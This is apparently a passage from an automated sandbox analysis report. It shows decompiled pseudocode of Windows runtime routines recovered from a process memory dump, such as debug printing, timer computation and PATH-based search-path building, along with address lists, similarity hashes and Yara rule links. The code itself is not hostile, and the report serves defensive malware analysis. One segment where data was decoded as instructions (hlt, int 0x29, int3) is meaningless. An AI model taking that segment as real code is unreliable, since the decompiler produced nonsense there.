							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L00F6DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E00F5B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E00F5B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E00F5E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E00F5A890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x00f1b171
0x00f1b171
0x00f1b171
0x00f1b171
0x00f1b171
0x00f1b176
0x00f1b17b
0x00f1b180
0x00f1b186
0x00f1b18f
0x00f1b198
0x00f1b1a4
0x00f1b1aa
0x00f74802
0x00f74802
0x00f74805
0x00f7480c
0x00f7480e
0x00f1b1d1
0x00f1b1d3
0x00f1b1de
0x00f1b1de
0x00f74817
0x00f7481e
0x00f74820
0x00f74822
0x00f74822
0x00f74824
0x00f74824
0x00f7482a
0x00000000
0x00000000
0x00f74835
0x00f7483a
0x00f7483d
0x00f7483f
0x00f74842
0x00f74842
0x00f74842
0x00f74846
0x00f7484c
0x00f7484e
0x00f74851
0x00f74851
0x00f74853
0x00f74854
0x00f74854
0x00f74858
0x00f7485a
0x00f7485a
0x00f7485d
0x00f7485f
0x00f74861
0x00f74861
0x00f74866
0x00f7486b
0x00f7486e
0x00f74871
0x00f74876
0x00f74876
0x00f74878
0x00f7487b
0x00f74884
0x00f74884
0x00000000
0x00f7487d
0x00f7487d
0x00f74882
0x00f74889
0x00f74889
0x00f7488f
0x00f74891
0x00f748e0
0x00f748e2
0x00f748e4
0x00f748e4
0x00f748e7
0x00f748e7
0x00f748ed
0x00f748f4
0x00f748f6
0x00f74951
0x00f74951
0x00f74953
0x00f74953
0x00f74956
0x00f74956
0x00f74958
0x00f74959
0x00f74959
0x00f7495d
0x00f7495d
0x00f7495f
0x00f7495f
0x00f74965
0x00f74969
0x00f749ba
0x00f749ba
0x00f749c1
0x00f749c5
0x00f749cc
0x00f749d4
0x00f749d7
0x00f749da
0x00f749e4
0x00f749e5
0x00f749f3
0x00f74a02
0x00000000
0x00f74a02
0x00f74972
0x00f74974
0x00000000
0x00000000
0x00f74976
0x00f74979
0x00f74982
0x00f74983
0x00f74984
0x00f7498b
0x00f7498d
0x00f74991
0x00f74993
0x00f74999
0x00f7499d
0x00f749a2
0x00f749a2
0x00f749a2
0x00f74999
0x00f749ac
0x00000000
0x00f749b3
0x00f748f8
0x00f748fe
0x00000000
0x00000000
0x00000000
0x00f748fe
0x00f74895
0x00f7489c
0x00f748ad
0x00f748b2
0x00f748b5
0x00f748b7
0x00f748ba
0x00f748bc
0x00f748c6
0x00f748c6
0x00f748cb
0x00f748d1
0x00f748d4
0x00f748d8
0x00f748d8
0x00000000
0x00f748d8
0x00f748be
0x00f748c0
0x00000000
0x00000000
0x00f748c2
0x00000000
0x00000000
0x00000000
0x00f748c4
0x00000000
0x00f74882
0x00f7487b
0x00f74904
0x00f74906
0x00000000
0x00000000
0x00f74908
0x00f7490e
0x00000000
0x00000000
0x00f74910
0x00f74917
0x00f74917
0x00000000
0x00f74917
0x00f1b1ba
0x00f747f9
0x00f747fc
0x00000000
0x00000000
0x00000000
0x00f747fc
0x00f1b1c0
0x00f1b1c0
0x00f1b1c3
0x00f1b1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 00F748AD

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: 73aacb698fea24605ae30dbcf4b3cb5b21652ae5b423bc2042530914373453be
Instruction ID: 89310a71a086947d7584e365d76e246ad4e0fa8aa6e731aa2b5ba4af72128f25
Opcode Fuzzy Hash: 73aacb698fea24605ae30dbcf4b3cb5b21652ae5b423bc2042530914373453be
Instruction Fuzzy Hash: A051F471D00259CFDB31CF64C845BAEBBB0BF04320F2081AAE95DAB281D7745D45EB92

Uniqueness

Uniqueness Score: -1.00%

Function 00F3B944, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00F3B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x100d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E00F37D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E00FE8CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E00F59E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E00F5B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E00F5CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E00F37D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E00FE8F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E00F5AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x1008628; // 0x0
								_v68 = _t77;
								_t78 =  *0x100862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x1008628; // 0x0
							_t116 =  *0x100862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}

0x00f3b94c
0x00f3b956
0x00f3b95c
0x00f3b95e
0x00f3b964
0x00f3b969
0x00f3b96d
0x00f3b96d
0x00f3b970
0x00f3b974
0x00f3b97a
0x00f3badf
0x00f3badf
0x00f3bae2
0x00f3bae4
0x00f3bae6
0x00f3baf0
0x00f82cb8
0x00f3baf6
0x00f3baf6
0x00f3baf6
0x00f3bafd
0x00f3bb1f
0x00f3bb1f
0x00f3baff
0x00f3bb00
0x00f3bb00
0x00f3bb03
0x00f3bb03
0x00f3bacb
0x00f3bacf
0x00f3bad0
0x00f3bad1
0x00f3badc
0x00f3badc
0x00f3b980
0x00f3b980
0x00f3b988
0x00f3b98b
0x00f3b98d
0x00f3b990
0x00f3b993
0x00f3b999
0x00f3b99b
0x00f3b9a1
0x00f3b9a5
0x00f3b9aa
0x00f3b9b0
0x00f3b9bb
0x00f3b9c0
0x00f3b9c3
0x00f3b9ca
0x00f3b9cc
0x00f3b9cf
0x00f3b9d3
0x00f3b9d7
0x00f3ba94
0x00f3ba94
0x00f3ba98
0x00f3baa3
0x00f82ccb
0x00f3baa9
0x00f3baa9
0x00f3baa9
0x00f3bab1
0x00f82cd5
0x00f82cdd
0x00f82cdd
0x00f3babb
0x00f3babc
0x00f3bac2
0x00f3bac3
0x00f3bac3
0x00f3bac6
0x00000000
0x00f3b9dd
0x00f3b9dd
0x00f3b9e7
0x00f3b9e7
0x00f3b9ec
0x00f3b9ec
0x00f3b9f1
0x00f3b9f5
0x00f3b9fa
0x00f3ba00
0x00f3ba0c
0x00f3ba10
0x00f3ba10
0x00f3ba12
0x00f3ba18
0x00000000
0x00000000
0x00f3bb26
0x00f3bb26
0x00f3ba1e
0x00f3ba1e
0x00f3ba23
0x00f3ba25
0x00f3ba2c
0x00f3ba30
0x00f3ba35
0x00f3ba35
0x00f3ba41
0x00f3ba46
0x00f3ba4c
0x00f3ba50
0x00f3ba54
0x00f3ba6a
0x00f3ba6e
0x00f3ba70
0x00f3ba74
0x00f3ba78
0x00f3ba7a
0x00f3ba7c
0x00f3ba8e
0x00f3ba90
0x00f3ba92
0x00f3bb14
0x00f3bb14
0x00f3bb16
0x00f3bb16
0x00000000
0x00f3ba7c
0x00f3bb0a
0x00f3bb0d
0x00000000
0x00000000
0x00000000
0x00f3bb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F3B9A5

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: 5f51aeef7290a978bd517abc8cda99a9c3a586fbea64338beaad5529c63b8f88
Instruction ID: b0944d62345824871873cd402ae3b710976a7335a8accb3887a7cec10b5e88eb
Opcode Fuzzy Hash: 5f51aeef7290a978bd517abc8cda99a9c3a586fbea64338beaad5529c63b8f88
Instruction Fuzzy Hash: 7B515B71A08741CFC720DF29C490A2ABBE5FB88720F24896EFA8587355D735EC44DB92

Uniqueness

Uniqueness Score: -1.00%

Function 00F42581, Relevance: 1.6, Strings: 1, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 81%

			E00F42581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, intOrPtr _a35, char _a1530200304, char _a1546911984) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t243;
				signed int _t247;
				void* _t248;
				signed int _t254;
				signed int _t256;
				intOrPtr _t258;
				signed int _t261;
				signed int _t268;
				signed int _t271;
				signed int _t279;
				intOrPtr _t285;
				signed int _t287;
				signed int _t289;
				void* _t290;
				void* _t291;
				signed int _t292;
				unsigned int _t295;
				signed int _t299;
				void* _t300;
				signed int _t301;
				signed int _t305;
				intOrPtr _t317;
				signed int _t326;
				signed int _t328;
				signed int _t329;
				signed int _t333;
				signed int _t334;
				signed int _t336;
				signed int _t338;
				signed int _t340;
				void* _t341;
				void* _t343;

				_t338 = _t340;
				_t341 = _t340 - 0x4c;
				_v8 =  *0x100d360 ^ _t338;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t333 = 0x100b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t295 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t285 = 0x48;
				_t315 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t326 = 0;
				_v37 = _t315;
				if(_v48 <= 0) {
					L16:
					_t45 = _t285 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t334 = 0xc0000106;
						goto L32;
					} else {
						_t333 = L00F34620(_t295,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t285);
						_v52 = _t333;
						__eflags = _t333;
						if(_t333 == 0) {
							_t334 = 0xc0000017;
							goto L32;
						} else {
							 *(_t333 + 0x44) =  *(_t333 + 0x44) & 0x00000000;
							_t50 = _t333 + 0x48; // 0x48
							_t328 = _t50;
							_t315 = _v32;
							 *((intOrPtr*)(_t333 + 0x3c)) = _t285;
							_t287 = 0;
							 *((short*)(_t333 + 0x30)) = _v48;
							__eflags = _t315;
							if(_t315 != 0) {
								 *(_t333 + 0x18) = _t328;
								__eflags = _t315 - 0x1008478;
								 *_t333 = ((0 | _t315 == 0x01008478) - 0x00000001 & 0xfffffffb) + 7;
								E00F5F3E0(_t328,  *((intOrPtr*)(_t315 + 4)),  *_t315 & 0x0000ffff);
								_t315 = _v32;
								_t341 = _t341 + 0xc;
								_t287 = 1;
								__eflags = _a8;
								_t328 = _t328 + (( *_t315 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t279 = E00FA39F2(_t328);
									_t315 = _v32;
									_t328 = _t279;
								}
							}
							_t299 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t334 = _v68;
								__eflags = 0;
								 *((short*)(_t328 - 2)) = 0;
								goto L32;
							} else {
								_t289 = _t333 + _t287 * 4;
								_v56 = _t289;
								do {
									__eflags = _t315;
									if(_t315 != 0) {
										_t243 =  *(_v60 + _t299 * 4);
										__eflags = _t243;
										if(_t243 == 0) {
											goto L30;
										} else {
											__eflags = _t243 == 5;
											if(_t243 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t289 =  *(_v60 + _t299 * 4);
										 *(_t289 + 0x18) = _t328;
										_t247 =  *(_v60 + _t299 * 4);
										__eflags = _t247 - 8;
										if(_t247 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t247 * 4 +  &M00F42959))) {
												case 0:
													__ax =  *0x1008488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E00F5F3E0(__edi,  *0x100848c, __ax & 0x0000ffff);
														__eax =  *0x1008488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E00F5F3E0(_t328, _v80, _v64);
													_t274 = _v64;
													goto L26;
												case 2:
													 *0x1008480 & 0x0000ffff = E00F5F3E0(__edi,  *0x1008484,  *0x1008480 & 0x0000ffff);
													__eax =  *0x1008480 & 0x0000ffff;
													__eax = ( *0x1008480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E00F5F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E00F5F3E0(_t328, _v76, _v36);
														_t274 = _v36;
													}
													L26:
													_t341 = _t341 + 0xc;
													_t328 = _t328 + (_t274 >> 1) * 2 + 2;
													__eflags = _t328;
													L27:
													_push(0x3b);
													_pop(_t276);
													 *((short*)(_t328 - 2)) = _t276;
													goto L28;
												case 6:
													__ebx =  *0x100575c;
													__eflags = __ebx - 0x100575c;
													if(__ebx != 0x100575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E00F5F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x100575c;
														} while (__ebx != 0x100575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x1008478 & 0x0000ffff = E00F5F3E0(__edi,  *0x100847c,  *0x1008478 & 0x0000ffff);
													__eax =  *0x1008478 & 0x0000ffff;
													__eax = ( *0x1008478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E00FA39F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x1006e58 & 0x0000ffff = E00F5F3E0(__edi,  *0x1006e5c,  *0x1006e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x1006e58 & 0x0000ffff;
													__eax = ( *0x1006e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t299 = _v16;
													_t315 = _v32;
													L29:
													_t289 = _t289 + 4;
													__eflags = _t289;
													_v56 = _t289;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t299 = _t299 + 1;
									_v16 = _t299;
									__eflags = _t299 - _v48;
								} while (_t299 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t247 =  *(_v60 + _t326 * 4);
						if(_t247 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t247 * 4 +  &M00F42935))) {
							case 0:
								__ax =  *0x1008488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t315 =  &_v64;
								_v80 = E00F42E3E(0,  &_v64);
								_t285 = _t285 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x1008480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1008480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E00F2EEF0(0x10079a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E00F2EB70(__ecx, 0x10079a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t221 = _v72;
											__eflags = _t221;
											if(_t221 != 0) {
												L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t221);
											}
											_t222 = _v52;
											__eflags = _t222;
											if(_t222 != 0) {
												__eflags = _t334;
												if(_t334 < 0) {
													L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t222);
													_t222 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t295 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x1007b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L00F34620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E00F2EB70(__ecx, 0x10079a0);
										__eax = _v52;
										L36:
										_pop(_t327);
										_pop(_t335);
										__eflags = _v8 ^ _t338;
										_pop(_t286);
										return E00F5B640(_t222, _t286, _v8 ^ _t338, _t315, _t327, _t335);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t281 = _v56;
								if(_v56 != 0) {
									_t315 =  &_v36;
									_t283 = E00F42E3E(_t281,  &_v36);
									_t295 = _v36;
									_v76 = _t283;
								}
								if(_t295 == 0) {
									goto L44;
								} else {
									_t285 = _t285 + 2 + _t295;
								}
								goto L14;
							case 6:
								__eax =  *0x1005764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x1008478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1008478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x1006e58 & 0x0000ffff;
								__eax = ( *0x1006e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t326 = _t326 + 1;
								if(_t326 >= _v48) {
									goto L16;
								} else {
									_t315 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t300 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					asm("hlt");
					 *((intOrPtr*)(_t333 + 0x28)) =  *((intOrPtr*)(_t333 + 0x28)) + _t247;
					asm("hlt");
					_t248 = _t247 + _t247;
					asm("daa");
					asm("hlt");
					 *_t333 =  *_t333 + _t300;
					asm("hlt");
					 *((intOrPtr*)(_t333 + 0x28)) =  *((intOrPtr*)(_t333 + 0x28)) + _t248;
					asm("hlt");
					 *0x1f00f426 =  *0x1f00f426 + _t248;
					_pop(_t290);
					asm("clc");
					 *((intOrPtr*)(_t248 +  &_a1530200304)) =  *((intOrPtr*)(_t248 +  &_a1530200304)) + _t315;
					asm("clc");
					 *_t315 =  *_t315 + _t248;
					_t343 = _t341 - _t333;
					 *((intOrPtr*)(_t248 - 0x9ff0bd8)) =  *((intOrPtr*)(_t248 - 0x9ff0bd8)) + _t248;
					asm("daa");
					asm("hlt");
					 *_t333 =  *_t333 + _t290;
					 *((intOrPtr*)(_t333 + 0x28)) =  *((intOrPtr*)(_t333 + 0x28)) + _t300;
					asm("hlt");
					_a35 = _a35 + _t290;
					asm("hlt");
					_pop(_t291);
					asm("clc");
					 *((intOrPtr*)(_t248 - _t315 + _t290 +  &_a1546911984)) =  *((intOrPtr*)(_t248 - _t315 + _t290 +  &_a1546911984)) + _t315;
					asm("clc");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0xfeff00);
					E00F6D08C(_t291, _t328, _t333);
					_v44 =  *[fs:0x18];
					_t329 = 0;
					 *_a24 = 0;
					_t292 = _a12;
					__eflags = _t292;
					if(_t292 == 0) {
						_t254 = 0xc0000100;
					} else {
						_v8 = 0;
						_t336 = 0xc0000100;
						_v52 = 0xc0000100;
						_t256 = 4;
						while(1) {
							_v40 = _t256;
							__eflags = _t256;
							if(_t256 == 0) {
								break;
							}
							_t305 = _t256 * 0xc;
							_v48 = _t305;
							__eflags = _t292 -  *((intOrPtr*)(_t305 + 0xef1664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t271 = E00F5E5C0(_a8,  *((intOrPtr*)(_t305 + 0xef1668)), _t292);
									_t343 = _t343 + 0xc;
									__eflags = _t271;
									if(__eflags == 0) {
										_t336 = E00F951BE(_t292,  *((intOrPtr*)(_v48 + 0xef166c)), _a16, _t329, _t336, __eflags, _a20, _a24);
										_v52 = _t336;
										break;
									} else {
										_t256 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t256 = _t256 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t336;
						__eflags = _t336;
						if(_t336 < 0) {
							__eflags = _t336 - 0xc0000100;
